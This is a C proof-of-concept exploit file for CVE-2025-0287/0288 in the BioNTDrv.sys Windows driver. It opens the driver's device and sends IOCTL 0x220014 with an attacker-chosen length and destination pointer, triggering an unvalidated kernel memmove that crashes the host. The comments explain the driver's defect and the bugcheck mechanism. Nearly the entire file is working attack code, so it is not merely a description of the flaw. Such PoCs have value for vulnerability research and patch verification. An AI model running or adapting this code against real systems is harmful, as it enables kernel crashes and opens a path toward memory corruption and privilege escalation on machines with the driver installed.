POC / POC_CVE-2025-0288.c C
 1#include <windows.h>
 2#include <stdio.h>
 3#include <stdint.h>
// Input buffer handed to the driver through DeviceIoControl.
//
// The layout is byte-packed so the three fields sit at offsets 0x0, 0x4 and
// 0x8 (16 bytes total) with no compiler padding. The "v7->..." names in the
// field notes come from a decompiler listing of the driver and appear to be
// a mis-typed view of the same buffer; only the offsets carry meaning here.
#pragma pack(push, 1)
struct _IOCTL_PAYLOAD {
    // Offset 0x0. Listed as *(DWORD*)&v7->Type in the decompiler output.
    uint32_t field0;
    // Offset 0x4. Listed as *(DWORD*)(&v7->Size + 1); a caller-supplied
    // byte count that the driver reads from the request.
    uint32_t length;
    // Offset 0x8. Listed as v7->MdlAddress; per the original author's note
    // the driver uses this caller-supplied value as a memmove destination,
    // which is the unvalidated-pointer defect a fixed driver has to reject.
    uint64_t dst;
};
#pragma pack(pop)

typedef struct _IOCTL_PAYLOAD IOCTL_PAYLOAD;
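// Crash demonstration against the BioNTDrv device object.
//
// Opens \\.\BioNTDrv and sends a single IOCTL (0x220014) whose 16-byte input
// buffer carries a caller-chosen length and destination address. 0x220014
// decodes as device type 0x22 (FILE_DEVICE_UNKNOWN), function 5,
// METHOD_BUFFERED, FILE_ANY_ACCESS, so the I/O manager applies no
// read/write access check of its own to this request; any gating has to come
// from the device object's security descriptor and from validation inside
// the driver, neither of which is visible in this file.
//
// Returns 1 if the device cannot be opened, 0 otherwise. On a host where the
// driver accepts the request, the call is not expected to return (see the
// note on payload.dst below).
//
// NOTE(review): the banner names CVE-2025-0287 / 0288 while the file is
// labelled CVE-2025-0288 only; which identifier this IOCTL path belongs to
// should be confirmed against the advisory.
int wmain(void)
{
    IOCTL_PAYLOAD payload = {0};
    DWORD bytesReturned = 0;
    DWORD lastError;
    BOOL ok;

    printf("[*] BioNTDrv.sys CVE-2025-0287 / 0288 crash PoC\n");

    HANDLE hDev = CreateFileW(L"\\\\.\\BioNTDrv", GENERIC_READ | GENERIC_WRITE,
                              0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDev == INVALID_HANDLE_VALUE) {
        // Narrow printf is used throughout: stdout was already used by the
        // narrow banner above, and mixing wide and narrow output on one
        // stream is undefined in ISO C.
        printf("CreateFileW failed: %lu\n", GetLastError());
        return 1;
    }

    payload.field0 = 0x0;
    payload.length = 0x300;
    // 0x4141414141414141 is a non-canonical x64 address, so a driver that
    // touches it faults rather than writing to mapped memory. That makes the
    // missing pointer validation observable as a bugcheck.
    payload.dst = 0x4141414141414141ULL;

    printf("[*] Sending IOCTL 0x220014\n");
    // uint64_t is not guaranteed to be unsigned long long; cast so the
    // argument type matches %llx exactly.
    printf("    dst    = 0x%llx\n", (unsigned long long)payload.dst);
    printf("    length = 0x%x\n", (unsigned int)payload.length);

    ok = DeviceIoControl(hDev, 0x220014, &payload, sizeof(payload),
                         NULL, 0, &bytesReturned, NULL);
    // The last-error value is only meaningful when the call failed; capture
    // it immediately and report ERROR_SUCCESS otherwise instead of a stale
    // code left over from an earlier API call.
    lastError = ok ? ERROR_SUCCESS : GetLastError();

    // Reaching this line means the driver rejected the request or handled it
    // without faulting, e.g. a build that validates the supplied pointer.
    printf("[!] DeviceIoControl returned: %d (GetLastError=%lu)\n",
           ok, lastError);

    CloseHandle(hDev);
    return 0;
}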